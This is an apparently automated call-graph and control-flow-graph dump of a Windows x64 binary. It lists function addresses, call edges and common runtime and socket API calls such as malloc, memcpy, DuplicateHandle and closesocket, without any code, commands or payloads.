7ff72a0bc3d0 75 API calls 148165->148168 148167 7ff72a0bb500 strlen 148166->148167 148170 7ff729fa9eca 148167->148170 148171 7ff729fa9e5f 148168->148171 148169 7ff729fa9fd3 148169->148091 148268 7ff729fe9a50 69 API calls 148170->148268 148262 7ff72a0bc1f0 148171->148262 148173 7ff729fa9e76 148265 7ff72a0c45e0 53 API calls 148173->148265 148176 7ff729fa9e8c 148266 7ff72a05bd40 70 API calls 148176->148266 148178 7ff729fa9ef0 148179 7ff729fa9f30 148178->148179 148269 7ff729fe9a50 69 API calls 148178->148269 148271 7ff729fe9a50 69 API calls 148179->148271 148180 7ff729fa9e9e 148267 7ff72a0c4b60 53 API calls 148180->148267 148184 7ff729fa9f20 148270 7ff72a076050 memcpy 148184->148270 148186 7ff729fa9f5c 148188 7ff729fa9f86 148186->148188 148272 7ff72a088f30 70 API calls 148186->148272 148188->148169 148273 7ff729fae580 117 API calls 148188->148273 148191 7ff72a0c4960 148190->148191 148192 7ff729fa9d6c 148190->148192 148275 7ff729f9beb5 148191->148275 148192->148150 148248 7ff72a071c50 148192->148248 148197 7ff72a0c5110 148300 7ff729fbceb0 53 API calls 148197->148300 148199 7ff72a0c49df 148298 7ff729f9a512 malloc 148199->148298 148200 7ff72a0c5115 148301 7ff72a0c45e0 53 API calls 148200->148301 148202 7ff72a0c4a00 148299 7ff729f9a512 malloc 148202->148299 148203 7ff72a0c4990 148203->148199 148203->148200 148203->148202 148206 7ff729f9beb5 13 API calls 148203->148206 148297 7ff729f99247 27 API calls 148203->148297 148206->148203 148207 7ff72a0c511f 148302 7ff72a0c4b60 53 API calls 148207->148302 148209 7ff72a0c49eb 148209->148192 148303 7ff729fbcee0 53 API calls 148209->148303 148376 7ff72a069d40 148248->148376 148250 7ff72a071c77 148521 7ff72a07aa00 148250->148521 148254 7ff72a071cb1 148254->148156 148256 7ff72a0ac507 148255->148256 148752 7ff72a0ac440 148256->148752 148259->148150 148260->148162 148261->148163 148784 7ff72a073470 strlen 148262->148784 148264 7ff72a0bc214 148264->148173 148265->148176 148266->148180 148268->148178 148269->148184 148270->148179 148271->148186 148272->148188 148273->148169 148274->148169 148276 7ff729f9bee2 148275->148276 148292 7ff729f9bed8 148275->148292 148276->148292 148304 7ff729f9b94a 148276->148304 148278 7ff729f9bf0f 148279 7ff729f9a46b malloc 148278->148279 148280 7ff729f9bf23 148279->148280 148281 7ff729f9bf2d 148280->148281 148284 7ff729f9bf82 148280->148284 148309 7ff729f9c9a8 148281->148309 148283 7ff729f9bf6f 148313 7ff729f9a512 malloc 148283->148313 148284->148283 148312 7ff729f97f40 __stdio_common_vfprintf 148284->148312 148287 7ff729f9bfcd 148314 7ff729f9ba33 __stdio_common_vfprintf free free 148287->148314 148288 7ff729f9c9a8 13 API calls 148291 7ff729f9bf57 148288->148291 148293 7ff729f9c9a8 13 API calls 148291->148293 148294 7ff729f9a46b 148292->148294 148293->148283 148366 7ff729f9a2c0 148294->148366 148296 7ff729f9a488 148296->148197 148296->148203 148297->148203 148298->148209 148299->148209 148301->148207 148305 7ff729f9b96d 148304->148305 148306 7ff729f9b9a9 calloc 148305->148306 148307 7ff729f9ba09 148305->148307 148308 7ff729f9b9d9 148306->148308 148307->148278 148308->148307 148315 7ff729f9c757 148309->148315 148312->148283 148313->148287 148314->148292 148327 7ff729f9bb72 148315->148327 148319 7ff729f9bf45 148319->148288 148324 7ff729f9c8a6 abort 148325 7ff729f9c8ab 148324->148325 148325->148319 148326 7ff729f9c901 abort 148325->148326 148326->148319 148328 7ff729f9bb95 148327->148328 148329 7ff729f9bb9f 148327->148329 148328->148319 148339 7ff729f9b2d5 148328->148339 148329->148328 148330 7ff729f9b94a calloc 148329->148330 148331 7ff729f9bbcc 148330->148331 148332 7ff729f9a46b malloc 148331->148332 148335 7ff729f9bbe0 148332->148335 148333 7ff729f9bbea 148360 7ff729f9a512 malloc 148333->148360 148335->148333 148359 7ff729f97f40 __stdio_common_vfprintf 148335->148359 148336 7ff729f9bc47 148361 7ff729f9ba33 __stdio_common_vfprintf free free 148336->148361 148340 7ff729f9a46b malloc 148339->148340 148341 7ff729f9b2f4 148340->148341 148342 7ff729f9b370 148341->148342 148343 7ff729f9b306 calloc 148341->148343 148364 7ff729f9ae17 malloc memcpy 148342->148364 148344 7ff729f9b320 148343->148344 148345 7ff729f9b35b 148343->148345 148362 7ff729f9ae17 malloc memcpy 148344->148362 148363 7ff729f9a512 malloc 148345->148363 148349 7ff729f9b37c 148365 7ff729f9a512 malloc 148349->148365 148350 7ff729f9b32c 148350->148345 148352 7ff729f9b347 free 148350->148352 148351 7ff729f9b36a 148353 7ff729f9b3ec 148351->148353 148352->148345 148353->148319 148355 7ff729f9b3f9 148353->148355 148356 7ff729f9b537 DuplicateHandle 148355->148356 148357 7ff729f9b417 148355->148357 148356->148324 148356->148325 148357->148356 148358 7ff729f9b532 abort 148357->148358 148358->148356 148359->148333 148360->148336 148361->148328 148362->148350 148363->148351 148364->148349 148365->148351 148369 7ff729f9a278 148366->148369 148368 7ff729f9a2de 148368->148296 148370 7ff729f9a29b 148369->148370 148371 7ff729f9a29f 148370->148371 148372 7ff729f9a2b1 148370->148372 148375 7ff729f9a1c7 malloc 148371->148375 148372->148368 148374 7ff729f9a2af 148374->148372 148375->148374 148377 7ff729f9beb5 13 API calls 148376->148377 148378 7ff72a069d65 148377->148378 148382 7ff72a069d7b 148378->148382 148529 7ff72a068b30 115 API calls 148378->148529 148379 7ff72a069dbb 148379->148250 148382->148379 148386 7ff72a0c5670 148382->148386 148527 7ff729fa4ce0 89 API calls 148382->148527 148383 7ff72a069d8b 148384 7ff729f9a46b malloc 148383->148384 148385 7ff72a069d96 148384->148385 148385->148386 148388 7ff72a069d9e 148385->148388 148530 7ff729fbceb0 53 API calls 148386->148530 148528 7ff729f9a512 malloc 148388->148528 148390 7ff72a0c56c1 148533 7ff729f8d930 RtlCaptureContext RtlUnwindEx abort 148390->148533 148391 7ff72a0c5681 148531 7ff72a0c45e0 53 API calls 148391->148531 148392 7ff72a069db3 148392->148379 148392->148390 148392->148391 148397 7ff72a0c5690 148532 7ff72a0c4b60 53 API calls 148397->148532 148522 7ff72a02e8d0 strlen 148521->148522 148523 7ff72a071c93 148522->148523 148524 7ff72a071b90 148523->148524 148534 7ff72a09ab10 148524->148534 148526 7ff72a071beb 148526->148254 148527->148383 148528->148392 148529->148382 148531->148397 148557 7ff72a096d20 148534->148557 148536 7ff72a09ab35 148561 7ff72a096ae0 148536->148561 148538 7ff72a09ab7c 148567 7ff72a0ac3e0 148538->148567 148540 7ff72a09aba6 148571 7ff72a066e30 148540->148571 148542 7ff72a09abca 148574 7ff72a0baed0 148542->148574 148544 7ff72a09abf7 148642 7ff72a095270 148544->148642 148546 7ff72a09ac5c 148647 7ff72a097940 148546->148647 148552 7ff72a09ac98 148663 7ff72a0951b0 69 API calls 148552->148663 148554 7ff72a09ad02 148664 7ff72a094a70 69 API calls 148554->148664 148556 7ff72a09ad2a 148556->148526 148559 7ff72a096d3a 148557->148559 148560 7ff72a096dd0 148559->148560 148665 7ff72a0b3870 69 API calls 148559->148665 148560->148536 148562 7ff72a096b0a 148561->148562 148666 7ff72a0ba8d0 148562->148666 148564 7ff72a096b34 148670 7ff72a095690 148564->148670 148566 7ff72a096bb1 148566->148538 148568 7ff72a0ac403 148567->148568 148684 7ff72a02bd40 148568->148684 148692 7ff72a066520 148571->148692 148575 7ff72a0baee4 148574->148575 148576 7ff72a0baef7 148575->148576 148699 7ff72a0c6550 53 API calls 148575->148699 148576->148544 148700 7ff72a070bc0 148642->148700 148644 7ff72a0952ad 148704 7ff72a0949f0 148644->148704 148646 7ff72a0952f1 148646->148546 148716 7ff72a097860 148647->148716 148649 7ff72a097a60 76 API calls 148654 7ff72a09795c 148649->148654 148650 7ff72a097a52 148656 7ff72a097a60 148650->148656 148651 7ff72a097860 164 API calls 148651->148654 148654->148649 148654->148650 148654->148651 148728 7ff72a094980 148654->148728 148732 7ff72a0948c0 69 API calls 148654->148732 148733 7ff72a066dc0 71 API calls 148654->148733 148658 7ff72a097a7f 148656->148658 148657 7ff72a097abe 148657->148552 148662 7ff72a0c6a70 54 API calls 148657->148662 148658->148657 148743 7ff72a076170 148658->148743 148661 7ff72a095690 75 API calls 148661->148657 148663->148554 148664->148556 148665->148560 148667 7ff72a0ba8e8 148666->148667 148668 7ff72a0ba8f3 148667->148668 148680 7ff72a0c6550 53 API calls 148667->148680 148668->148564 148671 7ff72a0956c7 148670->148671 148679 7ff72a0956b7 148670->148679 148672 7ff72a0956e3 148671->148672 148673 7ff72a0956d5 148671->148673 148675 7ff72a095700 148672->148675 148676 7ff72a0956f2 148672->148676 148681 7ff72a095870 75 API calls 148673->148681 148675->148679 148683 7ff72a095de0 75 API calls 148675->148683 148682 7ff72a096640 75 API calls 148676->148682 148679->148566 148681->148679 148682->148679 148683->148679 148685 7ff72a02bd6c 148684->148685 148688 7ff72a034300 148685->148688 148687 7ff72a02bd93 148687->148540 148689 7ff72a03433b 148688->148689 148690 7ff72a0509e0 140 API calls 148689->148690 148691 7ff72a03436b 148690->148691 148691->148687 148695 7ff72a02c830 148692->148695 148696 7ff72a02c84b 148695->148696 148697 7ff72a02c630 59 API calls 148696->148697 148698 7ff72a02c85c 148697->148698 148698->148542 148701 7ff72a070be8 148700->148701 148702 7ff72a070c62 148700->148702 148701->148644 148710 7ff72a0708d0 70 API calls 148702->148710 148705 7ff72a094a17 148704->148705 148711 7ff72a06ca60 148705->148711 148707 7ff72a094a22 148708 7ff72a094a53 148707->148708 148715 7ff72a0b3870 69 API calls 148707->148715 148708->148646 148710->148701 148712 7ff72a06ca7c 148711->148712 148713 7ff72a06c690 69 API calls 148712->148713 148714 7ff72a06ca8b 148713->148714 148714->148707 148715->148708 148734 7ff72a09aab0 148716->148734 148719 7ff72a097880 148722 7ff72a097860 164 API calls 148719->148722 148720 7ff72a0978d5 148721 7ff72a094980 69 API calls 148720->148721 148723 7ff72a0978fa 148721->148723 148724 7ff72a09789c 148722->148724 148742 7ff72a066dc0 71 API calls 148723->148742 148741 7ff72a066e00 71 API calls 148724->148741 148727 7ff72a0978d3 148727->148654 148729 7ff72a0949a0 148728->148729 148730 7ff72a0949f0 69 API calls 148729->148730 148731 7ff72a0949b0 148730->148731 148731->148654 148732->148654 148733->148654 148735 7ff72a096e00 164 API calls 148734->148735 148736 7ff72a09aac8 148735->148736 148737 7ff72a09a580 164 API calls 148736->148737 148740 7ff72a09787c 148736->148740 148738 7ff72a09aadf 148737->148738 148739 7ff72a097110 152 API calls 148738->148739 148738->148740 148739->148738 148740->148719 148740->148720 148741->148727 148742->148727 148746 7ff72a074a80 148743->148746 148747 7ff72a074ab3 148746->148747 148749 7ff72a074a95 148746->148749 148747->148661 148748 7ff72a074aae 148748->148747 148751 7ff72a074b07 memcpy 148748->148751 148749->148748 148750 7ff72a074b40 69 API calls 148749->148750 148750->148748 148751->148747 148755 7ff72a093830 148752->148755 148754 7ff729fa9de3 148754->148157 148754->148158 148757 7ff72a09387e 148755->148757 148756 7ff72a093882 148756->148754 148757->148756 148776 7ff72a07ab00 69 API calls 148757->148776 148759 7ff72a0938d8 148760 7ff72a09399f 148759->148760 148761 7ff72a09392e 148759->148761 148780 7ff72a09d270 69 API calls 148760->148780 148777 7ff72a09c020 69 API calls 148761->148777 148764 7ff72a0939d6 148766 7ff72a0939f0 148764->148766 148767 7ff72a0939dc 148764->148767 148765 7ff72a093965 148768 7ff72a09397f 148765->148768 148769 7ff72a09396b 148765->148769 148782 7ff72a09d1c0 59 API calls 148766->148782 148781 7ff72a09d180 59 API calls 148767->148781 148779 7ff72a09bf60 69 API calls 148768->148779 148778 7ff72a09bf20 69 API calls 148769->148778 148774 7ff72a093977 148774->148756 148783 7ff72a07aa60 69 API calls 148774->148783 148776->148759 148777->148765 148778->148774 148779->148774 148780->148764 148781->148774 148782->148774 148783->148756 148785 7ff72a07349e 148784->148785 148786 7ff72a07351a 148784->148786 148789 7ff72a0734b7 148785->148789 148790 7ff72a0734e8 148785->148790 148804 7ff72a0c66c0 69 API calls 148786->148804 148792 7ff72a0734c5 memcpy 148789->148792 148793 7ff72a0734d0 148789->148793 148794 7ff72a074bc0 148790->148794 148792->148793 148793->148264 148795 7ff72a074c0a 148794->148795 148796 7ff72a074b40 69 API calls 148795->148796 148797 7ff72a074c1b 148796->148797 148798 7ff72a074c3b 148797->148798 148799 7ff72a074c30 memcpy 148797->148799 148800 7ff72a074c60 148798->148800 148802 7ff72a074c53 memcpy 148798->148802 148799->148798 148801 7ff72a074c82 148800->148801 148803 7ff72a074c7a memcpy 148800->148803 148801->148793 148802->148800 148803->148801 148834 7ff72a062ac0 148805->148834 148811 7ff72a07513e 148810->148811 148812 7ff72a075180 148810->148812 148813 7ff72a075149 148811->148813 148816 7ff72a07519c memcpy 148811->148816 148814 7ff72a075189 148812->148814 148815 7ff72a0751ba 148812->148815 148813->148105 148848 7ff72a0c4510 148814->148848 148869 7ff72a0c66c0 69 API calls 148815->148869 148816->148105 148841 7ff72a0291c0 148834->148841 148836 7ff729faa20c 148837 7ff72a02c2d0 148836->148837 148839 7ff72a02c2eb 148837->148839 148838 7ff729faa218 148838->148107 148839->148838 148847 7ff729fca9a0 54 API calls 148839->148847 148844 7ff72a028500 148841->148844 148843 7ff72a0291d8 148843->148836 148845 7ff72a028518 148844->148845 148846 7ff72a028527 memset 148845->148846 148846->148843 148847->148838 148849 7ff72a0c4524 malloc 148848->148849 148850 7ff72a0c4531 148849->148850 148852 7ff72a0c4537 148849->148852 148850->148811 148851 7ff72a0c5190 148870 7ff72a0c45e0 53 API calls 148851->148870 148852->148849 148852->148851 148854 7ff72a0c519a 148871 7ff72a0c4b60 53 API calls 148854->148871 148870->148854 148873 7ff72a0ad1ff 148872->148873 148880 7ff72a0748b0 148873->148880 148875 7ff72a0ad223 148887 7ff72a073530 148875->148887 148878 7ff72a073530 73 API calls 148879 7ff72a0ad251 148878->148879 148879->148116 148882 7ff72a0748c9 148880->148882 148881 7ff72a0748d4 148881->148875 148882->148881 148883 7ff72a074b40 69 API calls 148882->148883 148884 7ff72a0748ed 148883->148884 148885 7ff72a074930 memcpy 148884->148885 148886 7ff72a074905 148884->148886 148885->148886 148886->148875 148888 7ff72a0735ca 148887->148888 148889 7ff72a07354f 148887->148889 148897 7ff72a0c66c0 69 API calls 148888->148897 148892 7ff72a073568 148889->148892 148893 7ff72a073590 148889->148893 148894 7ff72a07357e 148892->148894 148896 7ff72a073576 memcpy 148892->148896 148895 7ff72a074bc0 72 API calls 148893->148895 148894->148878 148895->148894 148896->148894 148899 7ff72a07367b 148898->148899 148900 7ff72a073606 148898->148900 148931 7ff72a0c66c0 69 API calls 148899->148931 148905 7ff72a07361f 148900->148905 148906 7ff72a073650 148900->148906 148909 7ff72a073638 148905->148909 148913 7ff72a07362d memcpy 148905->148913 148910 7ff72a074bc0 72 API calls 148906->148910 148909->148119 148910->148909 148913->148909 148933 7ff729fa7fdc 148932->148933 148938 7ff729fa7e10 148933->148938 148935 7ff729fa8006 148936 7ff72a062ac0 memset 148935->148936 148937 7ff729fa8013 148936->148937 148937->148077 148939 7ff729fa7e46 148938->148939 148940 7ff72a075680 70 API calls 148939->148940 148941 7ff729fa7eaa 148940->148941 148944 7ff729fa76f0 148941->148944 148943 7ff729fa7efc 148943->148935 148945 7ff729fa772a 148944->148945 148946 7ff72a076170 70 API calls 148945->148946 148947 7ff729fa773d 148946->148947 148958 7ff72a062b10 148947->148958 148950 7ff72a076170 70 API calls 148951 7ff729fa776b 148950->148951 148961 7ff729fa78f0 148951->148961 148953 7ff729fa7825 148954 7ff72a02c2d0 54 API calls 148953->148954 148955 7ff729fa788c 148954->148955 148984 7ff729fba0f0 148955->148984 148957 7ff729fa7898 148957->148943 148990 7ff72a029240 148958->148990 148962 7ff729fa791d 148961->148962 148963 7ff72a075680 70 API calls 148962->148963 148966 7ff729fa796b 148962->148966 148964 7ff729fa7951 148963->148964 149021 7ff729fb9b10 100 API calls 148964->149021 148967 7ff729fa799a 148966->148967 148968 7ff729fa7ae1 148966->148968 148970 7ff729fa79ee 148966->148970 149009 7ff729fae650 148967->149009 149024 7ff72a073970 77 API calls 148968->149024 149022 7ff72a0a3840 59 API calls 148970->149022 148972 7ff729fa7b0b 149012 7ff729fa8040 148972->149012 148974 7ff729fa7a35 148976 7ff72a075680 70 API calls 148974->148976 148977 7ff729fa7a73 148976->148977 148979 7ff72a075680 70 API calls 148977->148979 148978 7ff729fa7b37 148980 7ff72a02c2d0 54 API calls 148978->148980 148981 7ff729fa7a97 148979->148981 148982 7ff729fa7b7b 148980->148982 149023 7ff729fb9b10 100 API calls 148981->149023 148982->148953 148985 7ff729fba10e 148984->148985 149109 7ff72a046f10 148985->149109 148987 7ff729fba156 148988 7ff72a062ac0 memset 148987->148988 148989 7ff729fba206 148988->148989 148989->148957 148993 7ff729fa7754 148990->148993 148994 7ff72a029266 148990->148994 148991 7ff72a029380 149005 7ff72a027c20 101 API calls 148991->149005 148993->148950 148994->148991 148995 7ff72a0292cc 148994->148995 148997 7ff72a0288d0 148995->148997 148998 7ff72a0288fb 148997->148998 149001 7ff72a02890f 148997->149001 149006 7ff72a027e30 60 API calls 148998->149006 148999 7ff72a028a79 148999->148993 149001->148999 149007 7ff72a0051c0 99 API calls 149001->149007 149004 7ff72a028966 149004->148999 149008 7ff72a0051c0 99 API calls 149004->149008 149005->148993 149006->149001 149007->149004 149008->149004 149010 7ff72a0c4510 59 API calls 149009->149010 149011 7ff729fae66a 149010->149011 149011->148972 149025 7ff72a02abb0 149012->149025 149018 7ff729fa8220 213 API calls 149020 7ff729fa80e7 149018->149020 149055 7ff72a02abf0 149020->149055 149021->148966 149022->148974 149023->148967 149024->148967 149058 7ff72a05a150 149025->149058 149028 7ff729fa8220 149063 7ff72a02ac20 149028->149063 149030 7ff729fa8265 149031 7ff729fa8323 149030->149031 149088 7ff729fb2190 149030->149088 149032 7ff729fa8364 149031->149032 149066 7ff729fa76a0 149031->149066 149037 7ff729fa836b 149032->149037 149038 7ff729fa8390 149032->149038 149103 7ff72a02efa0 13 API calls 149032->149103 149069 7ff72a02ac60 149037->149069 149104 7ff72a02efa0 13 API calls 149038->149104 149043 7ff729fa808d 149043->149018 149043->149020 149044 7ff729fa84eb 149072 7ff72a0a47b0 149044->149072 149046 7ff729fa852d 149076 7ff72a0a1860 149046->149076 149048 7ff729fa8408 149048->149043 149048->149044 149105 7ff72a062930 100 API calls 149048->149105 149051 7ff729fa85bd 149084 7ff729fae2d0 149051->149084 149106 7ff72a05a190 149055->149106 149059 7ff729f817b9 malloc 149058->149059 149060 7ff72a05a168 149059->149060 149061 7ff729fa806f 149060->149061 149062 7ff72a0c6b00 70 API calls 149060->149062 149061->149028 149062->149061 149064 7ff72a066ce0 70 API calls 149063->149064 149065 7ff72a02ac4a 149064->149065 149065->149030 149067 7ff729fbffe0 108 API calls 149066->149067 149068 7ff729fa76c4 149067->149068 149068->149032 149070 7ff72a066d20 malloc 149069->149070 149071 7ff72a02ac7b 149070->149071 149071->149048 149073 7ff72a0a47df 149072->149073 149074 7ff72a04a380 59 API calls 149073->149074 149075 7ff72a0a4816 149073->149075 149074->149075 149075->149046 149078 7ff72a0a188f 149076->149078 149077 7ff729fa859f 149080 7ff729fa7040 149077->149080 149078->149077 149079 7ff72a04a0f0 59 API calls 149078->149079 149079->149077 149081 7ff729fa7063 149080->149081 149082 7ff729fb4540 213 API calls 149081->149082 149083 7ff729fa70be 149082->149083 149083->149051 149085 7ff729fae2f4 149084->149085 149086 7ff729fae2e8 149084->149086 149085->149043 149087 7ff72a0093a0 84 API calls 149086->149087 149087->149085 149089 7ff729fae990 27 API calls 149088->149089 149090 7ff729fb21b3 149089->149090 149091 7ff729fa82a5 149090->149091 149092 7ff729fae920 28 API calls 149090->149092 149091->149031 149093 7ff729fbfab0 149091->149093 149092->149091 149094 7ff729fa8309 149093->149094 149095 7ff729fbfacd 149093->149095 149097 7ff729fa50b0 149094->149097 149096 7ff729fb22a0 shutdown 149095->149096 149096->149094 149098 7ff729fa50cd 149097->149098 149101 7ff729fa50d2 149097->149101 149099 7ff72a02efa0 13 API calls 149098->149099 149099->149101 149100 7ff729fa5128 149100->149031 149101->149100 149102 7ff729faf0e0 closesocket 149101->149102 149102->149100 149103->149038 149104->149037 149105->149048 149107 7ff729f817d7 malloc 149106->149107 149108 7ff729fa80fa 149107->149108 149108->148978 149112 7ff72a02a6e0 149109->149112 149111 7ff72a046f28 149111->148987 149115 7ff72a029e80 149112->149115 149114 7ff72a02a6f8 149114->149111 149116 7ff72a029e98 149115->149116 149117 7ff72a029ea7 memset 149116->149117 149117->149114 149119 7ff729fa7c79 149118->149119 149124 7ff729fa7d10 149119->149124 149122 7ff72a062ac0 memset 149123 7ff729fa7cc8 149122->149123 149123->148127 149125 7ff729fa7d49 149124->149125 149136 7ff72a076130 strlen 149125->149136 149128 7ff72a076170 70 API calls 149129 7ff729fa7d73 149128->149129 149130 7ff72a062b10 101 API calls 149129->149130 149131 7ff729fa7d8a 149130->149131 149139 7ff729fa8120 149131->149139 149134 7ff729fba0f0 2 API calls 149135 7ff729fa7cbb 149134->149135 149135->149122 149148 7ff72a071d60 149136->149148 149140 7ff729fae650 59 API calls 149139->149140 149141 7ff729fa8143 149140->149141 149142 7ff729fa8040 213 API calls 149141->149142 149143 7ff729fa8173 149142->149143 149144 7ff72a02c2d0 54 API calls 149143->149144 149145 7ff729fa81e2 149144->149145 149146 7ff72a02c2d0 54 API calls 149145->149146 149147 7ff729fa7dd6 149146->149147 149147->149134 149149 7ff72a071e9c 149148->149149 149151 7ff72a071d93 149148->149151 149164 7ff72a0c66c0 69 API calls 149149->149164 149153 7ff72a071db9 149151->149153 149154 7ff72a071e50 149151->149154 149156 7ff72a071dcb 149153->149156 149157 7ff72a071e38 149153->149157 149155 7ff72a074bc0 72 API calls 149154->149155 149158 7ff729fa7d5c 149155->149158 149159 7ff72a071dfb 149156->149159 149161 7ff72a071de9 memcpy 149156->149161 149163 7ff72a072a50 memcpy memcpy memcpy 149157->149163 149158->149128 149159->149158 149162 7ff72a071e0a memcpy 149159->149162 149161->149159 149162->149158 149163->149158 149165 7ff729f9b54e 149166 7ff729f9b577 149165->149166 149167 7ff729f9b5b2 149165->149167 149167->149166 149168 7ff729f9b6e3 149167->149168 149169 7ff729f9b624 149167->149169 149170 7ff729f9b814 149168->149170 149172 7ff729f9b700 149168->149172 149194 7ff729f9c5a8 27 API calls 149169->149194 149170->149166 149201 7ff729f9a739 free 149170->149201 149197 7ff729f9c5a8 27 API calls 149172->149197 149175 7ff729f9b858 149178 7ff729f9b3f9 abort 149175->149178 149176 7ff729f9b74e 149179 7ff729f9b760 149176->149179 149180 7ff729f9b7ee 149176->149180 149178->149166 149198 7ff729f9a739 free 149179->149198 149200 7ff729f9a739 free 149180->149200 149181 7ff729f9b6a1 149184 7ff729f9b3f9 abort 149181->149184 149182 7ff729f9b637 149195 7ff729f9a739 free 149182->149195 149185 7ff729f9b6b5 149184->149185 149196 7ff729f9b1ae 7 API calls 149185->149196 149187 7ff729f9b7fe 149190 7ff729f9b3f9 abort 149187->149190 149189 7ff729f9b7a7 149191 7ff729f9b3f9 abort 149189->149191 149190->149166 149192 7ff729f9b7bb 149191->149192 149199 7ff729f9b1ae 7 API calls 149192->149199 149194->149182 149195->149181 149196->149166 149197->149176 149198->149189 149199->149166 149200->149187 149201->149175

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 7ff729fa5450-7ff729fa5487 1 7ff729fa5588-7ff729fa55f5 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 0->1 2 7ff729fa548d-7ff729fa54e8 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 0->2 20 7ff729fa5815-7ff729fa5882 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 1->20 21 7ff729fa55fb-7ff729fa561a 1->21 2->1 19 7ff729fa54ee-7ff729fa5587 call 7ff72a075680 * 2 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 call 7ff72a0577d0 2->19 19->1 65 7ff729fa5946-7ff729fa59b3 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 20->65 66 7ff729fa5888-7ff729fa5945 call 7ff72a075680 * 2 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 call 7ff72a0577d0 20->66 27 7ff729fa5620-7ff729fa562f 21->27 28 7ff729fa571f-7ff729fa572c 21->28 31 7ff729fa5631-7ff729fa56a3 call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 27->31 32 7ff729fa56a8-7ff729fa571a call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 27->32 33 7ff729fa57a2-7ff729fa5814 call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 28->33 34 7ff729fa572e-7ff729fa57a0 call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 28->34 31->20 32->20 33->20 34->20 101 7ff729fa5a9a-7ff729fa5aaf call 7ff729fd28a0 65->101 102 7ff729fa59b9-7ff729fa5a95 call 7ff72a075680 call 7ff72a0bc1f0 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 65->102 66->65 112 7ff729fa5ab5-7ff729fa5acc call 7ff72a008de0 101->112 113 7ff729fa5d19-7ff729fa5d86 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 101->113 102->101 124 7ff729fa5ad2-7ff729fa5ae5 112->124 125 7ff729fa5bf5-7ff729fa5c0d call 7ff72a0bb500 112->125 162 7ff729fa5e4a-7ff729fa5eb7 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 113->162 163 7ff729fa5d8c-7ff729fa5e49 call 7ff72a075680 * 2 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 call 7ff72a0577d0 113->163 126 7ff729fa5f57-7ff729fa5f71 call 7ff729fd28a0 124->126 127 7ff729fa5aeb-7ff729fa5b58 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 124->127 140 7ff729fa5c0f-7ff729fa5c27 call 7ff72a0bb500 125->140 141 7ff729fa5c43-7ff729fa5c48 125->141 144 7ff729fa5f8f-7ff729fa5f94 126->144 145 7ff729fa5f73-7ff729fa5f8d call 7ff729fd28a0 126->145 127->126 194 7ff729fa5b5e-7ff729fa5bf0 call 7ff72a08a3f0 call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 127->194 140->141 164 7ff729fa5c29-7ff729fa5c41 call 7ff72a0bb500 140->164 143 7ff729fa5c4f-7ff729fa5c51 141->143 143->126 150 7ff729fa5c57-7ff729fa5d14 call 7ff72a075680 * 2 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 call 7ff72a0577d0 143->150 153 7ff729fa5f9b-7ff729fa5f9d 144->153 145->144 167 7ff729fa5f96 145->167 150->126 160 7ff729fa6072-7ff729fa608c call 7ff729fd28a0 153->160 161 7ff729fa5fa3-7ff729fa6010 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 153->161 185 7ff729fa60b1 160->185 186 7ff729fa608e-7ff729fa60a8 call 7ff729fd28a0 160->186 161->160 233 7ff729fa6012-7ff729fa606d call 7ff729fa9950 call 7ff72a062960 call 7ff72a064a60 161->233 162->126 234 7ff729fa5ebd-7ff729fa5f52 call 7ff729fd2860 call 7ff72a08a3f0 call 7ff72a075680 call 7ff729fb9b10 call 7ff72a076010 call 7ff72a0577d0 call 7ff72a076010 162->234 163->162 164->141 190 7ff729fa5c4a 164->190 167->153 191 7ff729fa60b6-7ff729fa60b8 185->191 186->185 215 7ff729fa60aa-7ff729fa60af 186->215 190->143 199 7ff729fa60be-7ff729fa612b call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 191->199 200 7ff729fa618d-7ff729fa61a7 call 7ff729fd28a0 191->200 194->126 199->200 282 7ff729fa612d-7ff729fa6188 call 7ff729fa9950 call 7ff72a062960 call 7ff72a064a60 199->282 225 7ff729fa626b-7ff729fa6285 call 7ff729fd28a0 200->225 226 7ff729fa61ad-7ff729fa621a call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 200->226 215->191 248 7ff729fa6349-7ff729fa6365 call 7ff729faeba0 225->248 249 7ff729fa628b-7ff729fa62f8 call 7ff72a075680 call 7ff729fc2c50 call 7ff72a076010 call 7ff72a0577d0 225->249 226->225 301 7ff729fa621c-7ff729fa6266 call 7ff729fa9af0 call 7ff72a062960 call 7ff72a064a60 226->301 233->160 234->126 275 7ff729fa6380-7ff729fa6392 call 7ff72a075120 248->275 276 7ff729fa6367-7ff729fa637e call 7ff729fae000 248->276 249->248 315 7ff729fa62fa-7ff729fa6344 call 7ff729fa9af0 call 7ff72a062960 call 7ff72a064a60 249->315 295 7ff729fa6397-7ff729fa6435 call 7ff729fb39a0 call 7ff72a009490 call 7ff729fc2180 call 7ff729fd2860 call 7ff729fd26e0 call 7ff729fae310 275->295 276->295 282->200 333 7ff729fa6450 295->333 334 7ff729fa6437-7ff729fa644e 295->334 301->225 315->248 335 7ff729fa6455-7ff729fa6464 call 7ff72a076010 